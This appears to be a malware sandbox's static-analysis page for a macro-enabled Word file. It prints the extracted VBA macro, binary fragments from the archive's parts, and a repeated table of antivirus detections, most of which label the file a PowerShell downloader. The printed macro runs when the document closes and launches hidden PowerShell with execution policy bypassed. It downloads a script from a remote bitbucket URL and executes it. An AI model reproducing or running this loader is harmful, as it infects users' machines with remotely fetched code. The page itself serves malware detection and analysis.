Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub RunCommand() Dim script As String Dim shellResult As Variant script = "Invoke-RestMethod -Uri 'https://bitbucket.org/bypass_workers/main/raw/c3291e02cef4015bdeb6d1e8d6bb23f56afa7afe/init.ps1' | Invoke-Expression" shellResult = Shell("powershell.exe -NoProfile -ExecutionPolicy Bypass -Command """ & script & """", vbHide) End Sub Private Sub Document_Close() RunCommand End Sub

[Content_Types].xml

%[ILn7

d!4I>5yQ*'

TMsL2d

_rels/.rels

word/document.xml

word/_rels/document.xml.rels

,r$M.k4

word/footnotes.xml

<m0Oq)8

word/endnotes.xml

A\#EnA

Exg(tu

word/vbaProject.bin

@?0@lKD;

%~j&wKg

j0ZH[:

V2YgMZ

{,{w:n

CG'3Y+

r^=no#

>Z,*{h(

G]owXMA

t_/d%)Q

M3h-x6~

oZ|39m

[YcKj4

word/vbaProjectSignature.bin

}6U,Tln

nN:L/,+

umG9!Q

TQ_}d1o

XR `PS

D{6[0g

>M}4P+X

8LR%)G+

4v7e@i4lr

|Sc{JG

word/vbaProjectSignatureAgile.bin

H1 EA@P

Y)?9x/

J,l9''

(d<XrZ9}a

yGT<X_

>p9&A1"(APzY]

'qG?p^

>\:dlv

5MA\gm-

word/vbaProjectSignatureV3.bin

#@OE{!

)#/CrQ

78PU3{w

~cc~]3

'")hl0

)2UT9b

IQO6HQ

-L_:*`

H'#gR/{o

}[pn6dZ

d$(.b#WK

[.CQGq

word/theme/theme1.xml

!Ic@Y5

1S{}8D

.kuV@EqU

@<QrF,

!\n>g_;

docProps/thumbnail.emf

Shu?x;

i"jmZ7u

gdSO[N

word/_rels/vbaProject.bin.rels

word/vbaData.xml

word/settings.xml

d_2M9?

word/_rels/settings.xml.rels

-]R5/D]

customXml/item1.xml

l^4G94

customXml/itemProps1.xml

.5{{}NK

customXml/item2.xml

customXml/itemProps2.xml

customXml/item3.xml

4pbuFW

(d7h/.P

E!>\:N

V=I$U`

3L=4jA

2 rKCL

customXml/itemProps3.xml

k'wh]c

word/styles.xml

H%0W~&

iD|:bQ@

'Tho#T

ny"V/[o5

2Q-'U*T

Z*Y[VK%

+|3_\lqR

U}D-b{y

word/webSettings.xml

]?cv0$G

word/fontTable.xml

CNF~jL>

yq$qpR"

docProps/core.xml

Lq!79z]-

docProps/app.xml

j%aI.`

!RU%8l

docProps/custom.xml

,A@EyH

customXml/_rels/item1.xml.rels

customXml/_rels/item2.xml.rels

customXml/_rels/item3.xml.rels

[Content_Types].xmlPK

_rels/.relsPK

word/document.xmlPK

word/_rels/document.xml.relsPK

word/footnotes.xmlPK

word/endnotes.xmlPK

word/vbaProject.binPK

word/vbaProjectSignature.binPK

word/vbaProjectSignatureAgile.binPK

word/vbaProjectSignatureV3.binPK

word/theme/theme1.xmlPK

docProps/thumbnail.emfPK

word/_rels/vbaProject.bin.relsPK

word/vbaData.xmlPK

word/settings.xmlPK

word/_rels/settings.xml.relsPK

customXml/item1.xmlPK

customXml/itemProps1.xmlPK

customXml/item2.xmlPK

customXml/itemProps2.xmlPK

customXml/item3.xmlPK

customXml/itemProps3.xmlPK

word/styles.xmlPK

word/webSettings.xmlPK

word/fontTable.xmlPK

docProps/core.xmlPK

docProps/app.xmlPK

docProps/custom.xmlPK

customXml/_rels/item1.xml.relsPK

customXml/_rels/item2.xml.relsPK

customXml/_rels/item3.xml.relsPK

Antivirus	Signature
Bkav	Clean
Lionic	Clean
tehtris	Clean
Cynet	Malicious (score: 99)
CMC	Clean
CAT-QuickHeal	Clean
Skyhigh	Artemis!Trojan
ALYac	Clean
Malwarebytes	Clean
Sangfor	Trojan.Macro.PowerShell.se
K7AntiVirus	Clean
BitDefender	Clean
K7GW	Clean
Cybereason	Clean
BitDefenderTheta	Clean
VirIT	W97M/Downloader.AE
Symantec	ISB.Downloader!gen48
Elastic	malicious (high confidence)
ESET-NOD32	Clean
TrendMicro-HouseCall	Clean
Trustlook	Clean
ClamAV	Doc.Downloader.Powershell-10002004-0
Kaspersky	UDS:DangerousObject.Multi.Generic
Alibaba	Clean
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot	Clean
MicroWorld-eScan	Clean
Tencent	Office.Trojan-Dropper.Sdrop.Kzfl
Sophos	Clean
F-Secure	Heuristic.HEUR/Macro.Agent
DrWeb	Clean
VIPRE	Clean
FireEye	Clean
Emsisoft	Clean
Jiangmin	Clean
Varist	Clean
Avira	HEUR/Macro.Agent
MAX	Clean
Antiy-AVL	Trojan[Downloader]/MSOffice.Agent
Kingsoft	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Clean
SUPERAntiSpyware	Clean
ZoneAlarm	HEUR:Trojan-Dropper.MSOffice.SDrop.gen
Avast-Mobile	Clean
Google	Detected.Heuristic.Script
AhnLab-V3	Clean
Acronis	Clean
VBA32	Clean
TACHYON	Suspicious/WOX.XSR.Gen
Zoner	Probably Heur.W97ShellS
Rising	Heur.Macro.powershell.a (CLASSIC)
Yandex	Clean
Ikarus	Clean
MaxSecure	Clean
Fortinet	Clean
Panda	Clean
CrowdStrike	Clean
alibabacloud	Trojan:MSOffice/Macro.Akgpp

Antivirus

Signature

Bkav

Clean

Lionic

Clean

tehtris

Clean

Cynet

Malicious (score: 99)

CMC

Clean

CAT-QuickHeal

Clean

Skyhigh

Artemis!Trojan

ALYac

Clean

Malwarebytes

Clean

Sangfor

Trojan.Macro.PowerShell.se

K7AntiVirus

Clean

BitDefender

Clean

K7GW

Clean

Cybereason

Clean

BitDefenderTheta

Clean

VirIT

W97M/Downloader.AE

Symantec

ISB.Downloader!gen48

Elastic

malicious (high confidence)

ESET-NOD32

Clean

TrendMicro-HouseCall

Clean

Trustlook

Clean

ClamAV

Doc.Downloader.Powershell-10002004-0

Kaspersky

UDS:DangerousObject.Multi.Generic

Alibaba

Clean

NANO-Antivirus

Trojan.Ole2.Vbs-heuristic.druvzi

ViRobot

Clean

MicroWorld-eScan

Clean

Tencent

Office.Trojan-Dropper.Sdrop.Kzfl

Sophos

Clean

F-Secure

Heuristic.HEUR/Macro.Agent

DrWeb

Clean

VIPRE

Clean

FireEye

Clean

Emsisoft

Clean

Jiangmin

Clean

Varist

Clean

Avira

HEUR/Macro.Agent

MAX

Clean

Antiy-AVL

Trojan[Downloader]/MSOffice.Agent

Kingsoft

Clean

Gridinsoft

Clean

Xcitium

Clean

Arcabit

Clean

SUPERAntiSpyware

Clean

ZoneAlarm

HEUR:Trojan-Dropper.MSOffice.SDrop.gen

Avast-Mobile

Clean

Google

Detected.Heuristic.Script

AhnLab-V3

Clean

Acronis

Clean

VBA32

Clean

TACHYON

Suspicious/WOX.XSR.Gen

Zoner

Probably Heur.W97ShellS

Rising

Heur.Macro.powershell.a (CLASSIC)

Yandex

Clean

Ikarus

Clean

MaxSecure

Clean

Fortinet

Clean

Panda

Clean

CrowdStrike

Clean

alibabacloud

Trojan:MSOffice/Macro.Akgpp

Static Analysis

Original

Deobfuscated